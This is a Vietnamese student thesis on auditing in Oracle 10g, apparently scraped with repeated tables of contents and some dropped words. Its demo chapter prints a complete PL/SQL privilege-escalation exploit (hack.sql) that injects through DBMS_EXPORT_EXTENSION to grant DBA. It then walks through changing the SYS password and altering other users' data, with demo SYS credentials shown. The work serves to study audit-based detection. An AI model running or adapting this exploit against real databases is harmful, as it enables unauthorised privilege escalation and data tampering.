Kiểm toán Oracle 10g Học viện Kỹ thuật Mật mã MỤC LỤC Trang MỤC LỤC .1 Operating System DANH MỤC CÁC HÌNH VẼ DANH MỤC CÁC BẢNG LỜI MỞ ĐẦU .12 Chương .14 1.1 ƯU ĐIỂM CỦA ORACLE 14 1.2 TÍNH NĂNG CẢI TIẾN CỦA ORACLE 10G (ORACLE 10 GRID COMPUTING) 15 1.2.1 Oracle Database 10g 17 1.2.2 Oracle Application Server 10g 17 1.2.3 Oracle Enterprise Manager 10g 18 1.2.4 Cải tiến an ninh sở liệu riêng ảo (VPD) Oracle 10g 19 1.3 KIẾN TRÚC ORACLE SERVER .22 1.3.1 Oracle Instance 23 1.3.1.8 System Monitor (SMON) .29 1.3.1.9 Process Monitor (PMON) 29 1.3.1.10 Checkpoint Process (CKPT) .29 1.3.2 Oracle database 30 1.4 QUẢN TRỊ CSDL VỚI ORACLE ENTERPRISE MANAGER (OEM) .36 1.4.1 Khởi động OEM server 37 Ketnooi.com -1– Kết nối công dân điện tử Kiểm toán Oracle 10g Học viện Kỹ thuật Mật mã 1.4.2 Làm việc với OEM 37 1.4.3 Các chức OEM 39 1.5 KẾT NỐI TỚI ORACLE SERVER 40 1.5.1 Mô hình kết nối 40 1.5.2 Một số khái niệm liên quan đến kết nối 41 1.5.2.1 Connection (liên kết) 41 1.5.2.2 Session (phiên) .41 1.6 BẢO MẬT TRONG ORACLE 41 1.6.1 Trình tự kiện toàn an ninh Oracle Database 10g 42 1.6.2 Bảo mật sở liệu 43 1.6.2.1 Hạn chế truy cập đến liệu dịch vụ 43 1.6.2.2 Chứng thực người dùng 43 1.6.2.3 Giám sát cho Hành vi Đáng ngờ 44 1.6.3 Nguyên lý đặc quyền tối thiểu 44 1.6.3.1 Các nguyên lý đặc quyền tối thiểu .45 1.6.3.2 Áp dụng nguyên tắc đặc quyền tối thiểu 45 Chương .46 2.1 TẠI SAO PHẢI KIỂM TOÁN 46 2.1.1 Các hiểm hoạ an toàn sở liệu 46 2.1.2 Các yêu cầu bảo vệ sở liệu 49 2.1.3 Vai trò kiểm toán việc bảo vệ sở liệu 50 2.2 TỔNG QUAN VỀ KIỂM TOÁN 50 2.2.1 Định nghĩa kiểm toán 50 2.2.2 Các loại đường mòn (Trail) ghi (Record) 51 Ketnooi.com -2– Kết nối công dân điện tử Kiểm toán Oracle 10g Học viện Kỹ thuật Mật mã 2.2.2.1 Database Audit Trail (DBA_AUDIT_TRAIL) 54 2.2.2.2 Operating System Audit Trail .55 2.2.2.3 Syslog Audit Trail 58 2.2.2.4 Operating System and Syslog Audit Records 59 2.2.2.5 Các ghi có Operating System and Syslog Audit Trail 59 2.2.3 Duy trì đường mòn kiểm toán (Maintaining the Audit Trail) 60 2.3 CÁC LOẠI KIỂM TOÁN 61 2.3.1 Mandatory Auditing 62 2.3.2 Standard Database Auditing .63 2.3.2.1 Các bước kiểm toán 64 2.3.2.2 Trang Enterprise Manager Audit 75 2.3.2.3 Sử dụng trì thông tin kiểm toán 76 2.3.3 Value-Based Auditing 76 2.3.4 Fine-Grained Auditing 79 2.3.4.1 Các tính vượt trội kiểm toán FGA 79 2.3.4.2 Các thủ tục gói DBMS_FGA 82 2.3.4.3 FGA Guidelines (Hướng dẫn sử dụng FGA) .87 2.3.4.4 Một Số Hạn Chế Của FGA 88 2.3.5 DBA Auditing .88 2.3.5.1 Khởi tạo kiểm toán .88 2.3.5.2 Xem kiểm toán .89 Chương .90 3.1 KỊCH BẢN DEMO 91 Ketnooi.com -3– Kết nối công dân điện tử Kiểm toán Oracle 10g Học viện Kỹ thuật Mật mã 3.2 QUY MÔ DEMO .94 3.3 KẾT QUẢ ĐẠT ĐƯỢC 102 Chương .102 4.1 KẾT QUẢ ĐẠT ĐƯỢC 102 4.2 HẠN CHẾ 103 4.3 HƯỚNG PHÁT TRIỂN .103 4.4 ĐỀ XUẤT 103 DANH MỤC CÁC TỪ VIẾT TẮT Từ viết tắt Ý nghĩa SQL Structured Query Language PL/SQL Procedural Language/Structured Query Language OS Operating System XML eXtensible Markup Language SGA System Global Area VPD Virtual Private Database Ketnooi.com -4– Kết nối công dân điện tử Kiểm toán Oracle 10g OEM Học viện Kỹ thuật Mật mã Oracle Enterprise Manager DANH MỤC CÁC HÌNH VẼ Trang MỤC LỤC .1 Operating System DANH MỤC CÁC HÌNH VẼ DANH MỤC CÁC BẢNG LỜI MỞ ĐẦU .12 Chương .14 1.1 ƯU ĐIỂM CỦA ORACLE 14 1.2 TÍNH NĂNG CẢI TIẾN CỦA ORACLE 10G (ORACLE 10 GRID COMPUTING) 15 1.2.1 Oracle Database 10g 17 Ketnooi.com -5– Kết nối công dân điện tử Kiểm toán Oracle 10g Học viện Kỹ thuật Mật mã 1.2.2 Oracle Application Server 10g 17 1.2.3 Oracle Enterprise Manager 10g 18 1.2.4 Cải tiến an ninh sở liệu riêng ảo (VPD) Oracle 10g 19 1.3 KIẾN TRÚC ORACLE SERVER .22 1.3.1 Oracle Instance 23 1.3.1.8 System Monitor (SMON) .29 1.3.1.9 Process Monitor (PMON) 29 1.3.1.10 Checkpoint Process (CKPT) .29 1.3.2 Oracle database 30 1.4 QUẢN TRỊ CSDL VỚI ORACLE ENTERPRISE MANAGER (OEM) .36 1.4.1 Khởi động OEM server 37 1.4.2 Làm việc với OEM 37 1.4.3 Các chức OEM 39 1.5 KẾT NỐI TỚI ORACLE SERVER 40 1.5.1 Mô hình kết nối 40 1.5.2 Một số khái niệm liên quan đến kết nối 41 1.5.2.1 Connection (liên kết) 41 1.5.2.2 Session (phiên) .41 1.6 BẢO MẬT TRONG ORACLE 41 1.6.1 Trình tự kiện toàn an ninh Oracle Database 10g 42 1.6.2 Bảo mật sở liệu 43 1.6.2.1 Hạn chế truy cập đến liệu dịch vụ 43 1.6.2.2 Chứng thực người dùng 43 Ketnooi.com -6– Kết nối công dân điện tử Kiểm toán Oracle 10g Học viện Kỹ thuật Mật mã 1.6.2.3 Giám sát cho Hành vi Đáng ngờ 44 1.6.3 Nguyên lý đặc quyền tối thiểu 44 1.6.3.1 Các nguyên lý đặc quyền tối thiểu .45 1.6.3.2 Áp dụng nguyên tắc đặc quyền tối thiểu 45 Chương .46 2.1 TẠI SAO PHẢI KIỂM TOÁN 46 2.1.1 Các hiểm hoạ an toàn sở liệu 46 2.1.2 Các yêu cầu bảo vệ sở liệu 49 2.1.3 Vai trò kiểm toán việc bảo vệ sở liệu 50 2.2 TỔNG QUAN VỀ KIỂM TOÁN 50 2.2.1 Định nghĩa kiểm toán 50 2.2.2 Các loại đường mòn (Trail) ghi (Record) 51 2.2.2.1 Database Audit Trail (DBA_AUDIT_TRAIL) 54 2.2.2.2 Operating System Audit Trail .55 2.2.2.3 Syslog Audit Trail 58 2.2.2.4 Operating System and Syslog Audit Records 59 2.2.2.5 Các ghi có Operating System and Syslog Audit Trail 59 2.2.3 Duy trì đường mòn kiểm toán (Maintaining the Audit Trail) 60 2.3 CÁC LOẠI KIỂM TOÁN 61 2.3.1 Mandatory Auditing 62 2.3.2 Standard Database Auditing .63 2.3.2.1 Các bước kiểm toán 64 2.3.2.2 Trang Enterprise Manager Audit 75 Ketnooi.com -7– Kết nối công dân điện tử Kiểm toán Oracle 10g Học viện Kỹ thuật Mật mã 2.3.2.3 Sử dụng trì thông tin kiểm toán 76 2.3.3 Value-Based Auditing 76 2.3.4 Fine-Grained Auditing 79 2.3.4.1 Các tính vượt trội kiểm toán FGA 79 2.3.4.2 Các thủ tục gói DBMS_FGA 82 2.3.4.3 FGA Guidelines (Hướng dẫn sử dụng FGA) .87 2.3.4.4 Một Số Hạn Chế Của FGA 88 2.3.5 DBA Auditing .88 2.3.5.1 Khởi tạo kiểm toán .88 2.3.5.2 Xem kiểm toán .89 Chương .90 3.1 KỊCH BẢN DEMO 91 3.2 QUY MÔ DEMO .94 3.3 KẾT QUẢ ĐẠT ĐƯỢC 102 Chương .102 4.1 KẾT QUẢ ĐẠT ĐƯỢC 102 4.2 HẠN CHẾ 103 4.3 HƯỚNG PHÁT TRIỂN .103 4.4 ĐỀ XUẤT 103 Ketnooi.com -8– Kết nối công dân điện tử Kiểm toán Oracle 10g Học viện Kỹ thuật Mật mã DANH MỤC CÁC BẢNG Trang MỤC LỤC .1 Operating System DANH MỤC CÁC HÌNH VẼ DANH MỤC CÁC BẢNG LỜI MỞ ĐẦU .12 Chương .14 1.1 ƯU ĐIỂM CỦA ORACLE 14 1.2 TÍNH NĂNG CẢI TIẾN CỦA ORACLE 10G (ORACLE 10 GRID COMPUTING) 15 1.2.1 Oracle Database 10g 17 1.2.2 Oracle Application Server 10g 17 1.2.3 Oracle Enterprise Manager 10g 18 1.2.4 Cải tiến an ninh sở liệu riêng ảo (VPD) Oracle 10g 19 1.3 KIẾN TRÚC ORACLE SERVER .22 1.3.1 Oracle Instance 23 1.3.1.8 System Monitor (SMON) .29 1.3.1.9 Process Monitor (PMON) 29 1.3.1.10 Checkpoint Process (CKPT) .29 1.3.2 Oracle database 30 Ketnooi.com -9– Kết nối công dân điện tử Kiểm toán Oracle 10g Học viện Kỹ thuật Mật mã 1.4 QUẢN TRỊ CSDL VỚI ORACLE ENTERPRISE MANAGER (OEM) .36 1.4.1 Khởi động OEM server 37 1.4.2 Làm việc với OEM 37 1.4.3 Các chức OEM 39 1.5 KẾT NỐI TỚI ORACLE SERVER 40 1.5.1 Mô hình kết nối 40 1.5.2 Một số khái niệm liên quan đến kết nối 41 1.5.2.1 Connection (liên kết) 41 1.5.2.2 Session (phiên) .41 1.6 BẢO MẬT TRONG ORACLE 41 1.6.1 Trình tự kiện toàn an ninh Oracle Database 10g 42 1.6.2 Bảo mật sở liệu 43 1.6.2.1 Hạn chế truy cập đến liệu dịch vụ 43 1.6.2.2 Chứng thực người dùng 43 1.6.2.3 Giám sát cho Hành vi Đáng ngờ 44 1.6.3 Nguyên lý đặc quyền tối thiểu 44 1.6.3.1 Các nguyên lý đặc quyền tối thiểu .45 1.6.3.2 Áp dụng nguyên tắc đặc quyền tối thiểu 45 Chương .46 2.1 TẠI SAO PHẢI KIỂM TOÁN 46 2.1.1 Các hiểm hoạ an toàn sở liệu 46 2.1.2 Các yêu cầu bảo vệ sở liệu 49 2.1.3 Vai trò kiểm toán việc bảo vệ sở liệu 50 Ketnooi.com - 10 – Kết nối công dân điện tử Kiểm toán Oracle 10g Học viện Kỹ thuật Mật mã Gói lệnh sẵn có DBMS_EXPORT_EXTENSION Oracle Database, mặc định cho phép tài khoản Oracle truy cập 3.1 KỊCH BẢN DEMO Để minh họa kỹ thuật chèn mã vào gói DBMS_METADATA, dùng File mã lệnh hack.sql : File lệnh sử dụng kỹ thuật chèn mã trỏ nên cho phép tài khoản có quyền CREATE SESSION nâng quyền thành DBA Sau mã code file hack.sql whenever sqlerror exit rollback set feed on set head on set arraysize set space set verify off set pages 25 set lines 80 set termout on clear screen set serveroutput on size 1000000 spool dbms_exp_ext_c.lis undefine user_name undefine grant_revoke set feed off col system_date noprint new_value val_system_date select to_char(sysdate,'Dy Mon dd hh24:mi:ss yyyy') system_date from sys.dual; prompt check_ora_sql_injection: Release 1.0 Production on &val_system_date set feed on prompt accept user_name char prompt 'USERNAME TO CHECK [HONGTHUY]: ' default HONGTHUY accept grant_revoke char prompt 'PRIVS CONTROL [G]rant/[R]evoke [G]: ' default G prompt declare -lv_grant_revoke varchar2(1) := 'G'; lv_sqlcmd varchar2(1000):= 'GRANT ALL PRIVILEGE, DBA TO ' || upper('&&user_name'); lv_evil_cursor varchar2(1000); lv_cursor_output varchar2(100); lv_nol number := 2; lv_cursor_number varchar2(10); lv_exec_cursor varchar2(1000); lv_run_inject_cursor varchar2(1000); lv_evil_function varchar2(1000); Ketnooi.com - 91 – Kết nối công dân điện tử Kiểm toán Oracle 10g Học viện Kỹ thuật Mật mã lv_run_evil_function varchar2(1000); lv_DBA number := 0; -function isDBA return varchar2 is lv_DBA varchar2(1) := '0'; begin select '1' INTO lv_DBA from granted_role='DBA'; return lv_DBA; exception when others then return lv_DBA; end; begin dbms_output.enable(1000000); user_role_privs where lv_grant_revoke:=upper('&&grant_revoke'); if lv_grant_revoke='R' then dbms_output.put_line(' - REVOKING DBA FROM '|| upper('&&user_name')||' '); lv_sqlcmd := 'REVOKE ALL PRIVILEGE, DBA FROM ' || upper('&&user_name'); execute immediate lv_sqlcmd; dbms_output.put_line(' - DONE!'); return; end if; -DBMS_EXPORT_EXTENSION -lv_evil_cursor := 'DECLARE MYC_PKG_1 NUMBER;'|| 'BEGIN MYC_PKG_1 := DBMS_SQL.OPEN_CURSOR; ' || 'DBMS_SQL.PARSE(MYC_PKG_1,'''|| 'CREATE OR REPLACE PACKAGE BUNKERPKG AUTHID CURRENT_USER '|| 'IS FUNCTION ODCIIndexGetMetadata (a SYS.odciindexinfo, ' || 'b VARCHAR2,c VARCHAR2, d SYS.odcienv) RETURN NUMBER; END;'',0); '|| 'DBMS_OUTPUT.PUT_LINE(''Cursor1 ''||MYC_PKG_1); END;'; insert into app_log values(sysdate,lv_evil_cursor); commit; execute immediate lv_evil_cursor; lv_evil_cursor := 'DECLARE MYC_PKG_2 NUMBER;'|| 'BEGIN MYC_PKG_2 := DBMS_SQL.OPEN_CURSOR;' || 'DBMS_SQL.PARSE(MYC_PKG_2,'''|| 'CREATE OR REPLACE PACKAGE BODY BUNKERPKG IS '|| 'FUNCTION ODCIIndexGetMetadata (a SYS.odciindexinfo, b VARCHAR2,'|| 'c VARCHAR2, d SYS.odcienv) RETURN NUMBER IS '|| 'PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''' || lv_sqlcmd ||''''';'||' COMMIT; RETURN(1); END;END;'',0); '|| Ketnooi.com - 92 – Kết nối công dân điện tử Kiểm toán Oracle 10g Học viện Kỹ thuật Mật mã 'DBMS_OUTPUT.PUT_LINE(''Cursor2 ''|| MYC_PKG_2); END;'; -insert into app_log values(sysdate,lv_evil_cursor); commit; execute immediate lv_evil_cursor; dbms_output.put_line(' - CHECK CURSOR INJECTION'); begin lv_run_inject_cursor := 'DECLARE PLS PLS_INTEGER; '|| 'RET VARCHAR2(200);BEGIN RET := '|| 'SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADA TA(''A'',''' || upper('&&user_name')||''',''BUNKERPKG'','''|| upper('&&user_name')||''','''',PLS,0);END;'; insert into app_log values(sysdate,lv_run_inject_cursor); commit; execute immediate lv_run_inject_cursor; exception when others then null; end; if isDBA='1' then dbms_output.put_line(' - THUY dai ka ^^ GOT THE DBA!!'); return; end if; exception when others then dbms_output.put_line('ERROR: '||sqlcode); dbms_output.put_line('MSG: '||sqlerrm); end; / spool off whenever sqlerror continue Tài khoản SYS đăng nhập sở liệu với tài khoản pass SYS/abcd1234 Sau : • Tạo bảng MUCLUONG chèn liệu vào bảng • Tạo user GIAOVU HONGTHUY • Gán quyền CONNECT ,CREATE TABLE, CREATE PROCEDURE cho user • Dùng câu lệnh Audit để kiểm soát tất hành động user User GIAOVU kết nối vào database tạo bảng có tên DIEM chèn liệu vào bảng Kết nối database với User HONGTHUY Sau thực File mã lệnh @hack.sql để nâng quyền tài khoản HONGTHUY thành DBA Ketnooi.com - 93 – Kết nối công dân điện tử Kiểm toán Oracle 10g Học viện Kỹ thuật Mật mã Sau User HONGTHUY tiến hành sửa đổi sở liệu với quyền DBA • Sửa đổi thông số bảng DIEM user GIAOVU • Sửa đôi thông số mức lương user SYS không đủ thầm quyền Ta cần kết nối với database user SYS Vậy nên ta dùng câu lệnh ALTER user để đổi pass user SYS đăng nhập với quyền SYS thay đổi thông số bảng MUCLUONG thành công Như user HONGTHUY thay đổi toàn sở liệu Để gỡ quyền SYS ta thực lại mã lệnh ban đầu 3.2 QUY MÔ DEMO Bước : SYS kết nối vào sở liệu với ID/PASS : SYS/abcd1234.Sau : - Kích hoạt tính kiểm toán - Khởi động lại sở liệu - Tạo user HONGTHUY/pass Hình 3.1: Tạo User HONGTHUY - Tạo User GIAOVU Ketnooi.com - 94 – Kết nối công dân điện tử Kiểm toán Oracle 10g Học viện Kỹ thuật Mật mã Hình 3.2: Tạo User GIAOVU Bước : Gán quyền kiểm toán hành động user Hình 3.3: Gán quyền kiểm toán user Bước : SYS tạo bảng liệu NHANSU (Ten,Mucluong) Ketnooi.com - 95 – Kết nối công dân điện tử Kiểm toán Oracle 10g Học viện Kỹ thuật Mật mã Hình 3.4 SYS tạo bảng liệu nhân Bước 4: • Kết nối sở liệu user: GIAOVU • Tạo bảng liệu DIEM (Sinhvien, diem) • Chèn liệu vào bảng Hình 3.5: User GIAOVU tạo bảng DIEM Bước : Từ hình cmd kết nối User HONGTHUY vào database câu lệnh: sqlplus hongthuy/password Ketnooi.com - 96 – Kết nối công dân điện tử Kiểm toán Oracle 10g Học viện Kỹ thuật Mật mã Hình 3.6: User HONGTHUY kết nối vào database Bước : View quyền HONGTHUY có quyền connect Hình 3.7: Show bảng liệu Bước : Thực file mã lệnh @hack Ketnooi.com - 97 – Kết nối công dân điện tử Kiểm toán Oracle 10g Học viện Kỹ thuật Mật mã Hình 3.8: Thực file mã lệnh @hack Hình 3.9: User HONGTHUY nâng thành quyền SYS Ketnooi.com - 98 – Kết nối công dân điện tử Kiểm toán Oracle 10g Học viện Kỹ thuật Mật mã Hình 3.10 : Kiểm tra lại quyền HONGTHUY nâng lên SYS Bước 8: User HONGTHUY sửa đổi liệu bảng GIAOVU.DIEM Hình 3.11: User HONGTHUY sửa đổi liệu bảng GIAOVU.DIEM Bước : Sửa đổi liệu User SYS Ketnooi.com - 99 – Kết nối công dân điện tử Kiểm toán Oracle 10g Học viện Kỹ thuật Mật mã Hình 3.12: User HONGTHUY chưa đủ quyền sửa liệu SYS Hình 3.13: Dùng câu lệnh Alter user để sửa pass SYS thành hongthuy Ketnooi.com - 100 – Kết nối công dân điện tử Kiểm toán Oracle 10g Học viện Kỹ thuật Mật mã Hình 3.14: kết nối database user SYS/hongthuy sửa đổi bảng NHANSU Bước 10: Dùng câu lệnh Select * from dba_audit_trail để xem kiểm toán Ketnooi.com - 101 – Kết nối công dân điện tử Kiểm toán Oracle 10g Học viện Kỹ thuật Mật mã Hình 3.15: kết nối database user SYS/hongthuy sửa đổi bảng NHANSU 3.3 KẾT QUẢ ĐẠT ĐƯỢC Sau công user HONGTHUY user bình thường có quyền CONNECT leo thang thành DBA, sửa liệu user khác Không user HONGTHUY đổi pass user SYS để sửa đổi liệu SYS hệ thống Ta sử dụng kiểm toán standard database auditing để ghi lại hành động công leo thang đặc quyền user HONGTHUY.Bao gồm ngày công, hành động công, đối tượng bị công Trong thực tế có kẻ công tương tự trên, nhờ ghi kiểm toán mà ta phát ngăn chặn kịp thời giảm thiểu tối đa thiệt hại Chương KẾT LUẬN 4.1 KẾT QUẢ ĐẠT ĐƯỢC Sau thời gian tìm hiểu, nghiên cứu, đề tài em đạt số kết sau: Nội dung đề tài phần khái quát ưu điểm trội Oracle 10g kiến trúc, quản trị bảo mật Đặc biệt sâu vào tìm hiểu chức phương thức hoạt động loại kiểm toán Oracle 10g.Không thấy tầm quan trọng kiểm toán việc bảo vệ liệu Ketnooi.com - 102 – Kết nối công dân điện tử Kiểm toán Oracle 10g Học viện Kỹ thuật Mật mã Đồng thời em vào xây dựng công nâng quyền cho user bình thường thành quyền SYS kiểm toán thực tốt chức lưu lại dấu vết 4.2 HẠN CHẾ Bên cạnh kết đạt đề tài em số hạn chế phần demo kiểm toán phát công sau xem kiểm toán Kiểm toán lưu hành động công vào sở liệu hành động gì, chi tiết hành động 4.3 HƯỚNG PHÁT TRIỂN Từ kết nghiên cứu đề tài từ hạn chế trên, em muốn đặt vấn đề định hướng phát triển đề tài tương lai là: Về chu trình kiểm toán demo tạo trigger để kiểm toán lưu lại chi tiết hành động công giúp DBA dễ dàng khôi phục lại sở liệu bị xâm phạm Đi sâu vào nghiên cứu Oracle Audit Vault (Oracle kiểm toán kho quỹ) Oracle Audit Vault giải pháp mang tính hiệu cao nhằm củng cố, phát hiện, theo dõi, cảnh báo báo cáo số liệu kiểm toán để kiểm toán bảo mật tuân thủ sách bảo mật Oracle Audit Vault cung cấp khả hợp liệu kiện quan trọng từ hệ thống khác sở liệu, máy chủ ứng dụng, ứng dụng, hệ điều hành vào kho quản lý bảo mật tập trung Củng cố kiểm toán an toàn liệu - Oracle 9i Release cao SQL Server 2000, 2005 IBM DB2 UDB 8,5 9,2 Sybase ASE 12,5-15,0 Bảo mật khả mở rộng Làm nguồn liệu Oracle kiểm toán 4.4 ĐỀ XUẤT Ketnooi.com - 103 – Kết nối công dân điện tử Kiểm toán Oracle 10g Học viện Kỹ thuật Mật mã Kiểm toán phần thiếu lĩnh vực bảo mật sở liệu Nhưng bên cạnh ưu điểm kiểm toán tồn nhược điểm không kiểm toán mức gây giảm hiệu suất hệ thống tăng lượng lưu trữ ghi không cần thiết gây lãng phí tài nguyên Song song với chế kiểm toán để bảo đảm an toàn tối đa cần sử dụng công cụ kết hợp IDS IPS GreenSQL, AppDetective… để sớm phát ngăn chặn công làm tổn hại sở liệu Khi sử dụng Oracle 10g người dùng cần ý số vấn đề như: • Môi trường điện toán mạng lưới khó cho người quản trị sử dụng công cụ quản trị truyền thống • Không sử dụng mật mặc định hệ thống để đảm bảo an toàn cho sữ liệu truy cập • Thường xuyên cập nhật vá lỗi Oracle Cuối em xin chân thành cám ơn quý thầy cô khoa công nghệ thông tin Học Viện Kĩ Thuật Mật Mã nhiệt tình giảng dạy truyền đạt kiến thức bổ ích cho em.Và đặc biệt Cô giáo Trần Thị Lượng bỏ nhiếu tâm huyết hướng dẫn em hoàn thành đồ án Ketnooi.com - 104 – Kết nối công dân điện tử Kiểm toán Oracle 10g Học viện Kỹ thuật Mật mã TÀI LIỆU THAM KHẢO [1] http://vnoug.org/viewtopic [2] http://www.oracle-base.com/articles/10g/Auditing_10gR2.php [3] http://download.oracle.com [4] http://www.kmasecurity.net [5] http://www.oravn.com [6] http://download.oracle.com/docs/ Ketnooi.com - 105 – Kết nối công dân điện tử [...]... tài: Kiểm Toán Trong Oracle 10g Đề tài yêu cầu tập trung tìm hiểu và sử dụng kiểm toán trong Oracle 10g, Oracle 10g là một phiên bản mới với nhiều tính năng vượt trội của hệ quản trị cơ sở dữ liệu Oracle Bố cục đồ án bao gồm bốn chương : Chương 1: Tổng quan về Oracle 10g Chương 2: Kiểm toán trong Oracle 10g Chương 3: Demo Chèn Mã SQL, PL/SQL Nâng Quyền DBA Với DBMS_EXPORT_EXTENSION Trong ORACLE 10g. .. (The three grid-infrastructure) của việc phát hành Oracle1 0g là:  Oracle Database 10g  Oracle Application Server 10g  Oracle Enterprise Manager 10g Grid Control Và cải tiến về cơ sở dữ liệu đã tạo ra bước đột phá cho Oracle 10g 1.2.1 Oracle Database 10g Oracle Database 10g được thiết kế để lưu trữ và quản lý thông tin doanh nghiệp Cơ sở dữ liệu Oracle 10g cắt giảm chi phí quản lý và cung cấp dịch vụ... thiêt.Giám sát và kiểm toán đã trở thành một phần không thể thiếu trong lĩnh vực bảo mật cơ sở dữ liệu và với hệ quản trị cơ sở dữ liệu Oracle cũng vậy Trong xu thế hiện nay Oracle đang ngày càng chiếm lĩnh được thị trường nhờ những ưu điểm nổi bật cả về quản trị và bảo mật dữ liệu Kiểm toán trong hệ quản trị Oracle là một đề tài hấp dẫn trong lĩnh vực bảo mật Thấy được tầm quan trọng của việc kiểm toán đối... được trong cơ sở dữ liệu Oracle Database 10g có các dịch vụ thông qua có thể lưu trữ siêu dữ liệu về thông tin được lưu trữ trong hệ thống tập tin Có thể sử dụng cơ sở dữ liệu máy chủ để quản lý và phục vụ thông tin bất cứ nơi nào nó nằm 1.2.2 Oracle Application Server 10g Ketnooi.com - 17 – Kết nối công dân điện tử Kiểm toán trong Oracle 10g Học viện Kỹ thuật Mật mã Oracle Application Server 10g cung... 2.3.4.1 Các tính năng vượt trội của kiểm toán FGA 79 2.3.4.2 Các thủ tục trong gói DBMS_FGA 82 2.3.4.3 FGA Guidelines (Hướng dẫn sử dụng FGA) .87 2.3.4.4 Một Số Hạn Chế Của FGA 88 2.3.5 DBA Auditing .88 2.3.5.1 Khởi tạo kiểm toán .88 Ketnooi.com - 11 – Kết nối công dân điện tử Kiểm toán trong Oracle 10g Học viện Kỹ thuật Mật mã 2.3.5.2 Xem kiểm toán .89 Chương 3 ... nhiệm vụ khác trong một nhóm mục tiêu thay vì trên nhiều hệ thống riêng, Grid Control cho phép mở rộng quy mô với phát triển một lưới điện Ketnooi.com - 18 – Kết nối công dân điện tử Kiểm toán trong Oracle 10g Học viện Kỹ thuật Mật mã 1.2.3.1 Cung cấp phần mềm Với Grid Control, Oracle 10g tự động cài đặt, cấu hình, và nhân bản của ứng dụng Server 10g và Database 10g trên các nút bội Oracle Enterprise... tablespace Dữ liệu trong một datafile có thể đọc ra và lưu vào vùng nhớ bộ đệm của Oracle Ví dụ: khi một user muốn truy cập dữ liệu trong một table thuộc database Trong trường hợp thông tin yêu cầu không có trong cache memory Ketnooi.com - 31 – Kết nối công dân điện tử Kiểm toán trong Oracle 10g Học viện Kỹ thuật Mật mã hiện thời, nó sẽ được đọc trực tiếp từ các datafiles ra và lưu trữ vào trong bộ nhớ Tuy... thành cảm ơn Cử nhân Trần Thị Lượng, các thầy cô giáo trong khoa An Toàn Thông Tin Học Viện Kỹ Thuật Mật Mã đã nhiệt tình hướng dẫn giúp đỡ em hoàn thành đồ án này Sinh viên thực hiện Cao Thị Hồng Thúy Ketnooi.com - 13 – Kết nối công dân điện tử Kiểm toán trong Oracle 10g Học viện Kỹ thuật Mật mã Chương 1 TỔNG QUAN VỀ ORACLE 10G 1.1 ƯU ĐIỂM CỦA ORACLE Oracle không chỉ nhắm tới những doanh nghiệp lớn mà... Ketnooi.com - 22 – Kết nối công dân điện tử Kiểm toán trong Oracle 10g Học viện Kỹ thuật Mật mã 1.3.1 Oracle Instance Oracle instance bao gồm một cấu trúc bộ nhớ System Global Area (SGA) và các background processes (tiến trình nền) được sử dụng để quản trị cơ sở dữ liệu Oracle instance được xác định qua tham số môi trường ORACLE_ SID của hệ điều hành Hình 1.2 Kiến trúc Oracle Server System Global Area - SGA... với version trước đó) 1.2 TÍNH NĂNG CẢI TIẾN CỦA ORACLE 10G (ORACLE 10 GRID COMPUTING) Oracle Database 10g được phát hành với phiên bản 10.1.0.2 vào mùa xuân năm 2004 Oracle Database 10g là hệ thống cơ sở dữ liệu đầu tiên được thiết kế nhằm tăng sức mạnh lưu trữ và xử lý dữ liệu dựa trên công nghệ tính toán lưới (Grid Computing) Việc phát hành Oracle1 0g cung cấp cơ sở hạ tầng hiệu năng cao toàn diện, ... dụng kiểm toán Oracle 10g, Oracle 10g phiên với nhiều tính vượt trội hệ quản trị sở liệu Oracle Bố cục đồ án bao gồm bốn chương : Chương 1: Tổng quan Oracle 10g Chương 2: Kiểm toán Oracle 10g. .. tử Kiểm toán Oracle 10g Học viện Kỹ thuật Mật mã Sản phẩm ba lưới sở hạ tầng (The three grid-infrastructure) việc phát hành Oracle1 0g là:  Oracle Database 10g  Oracle Application Server 10g. .. thông số liên quan đến kiểm toán khởi tạo quản lý đối tượng kiểm toán để báo cáo kiểm toán lược đồ đối tượng kiểm toán Ví dụ, Enterprise Manager cho thấy thuộc tính báo cáo kiểm toán tại, đặc quyền,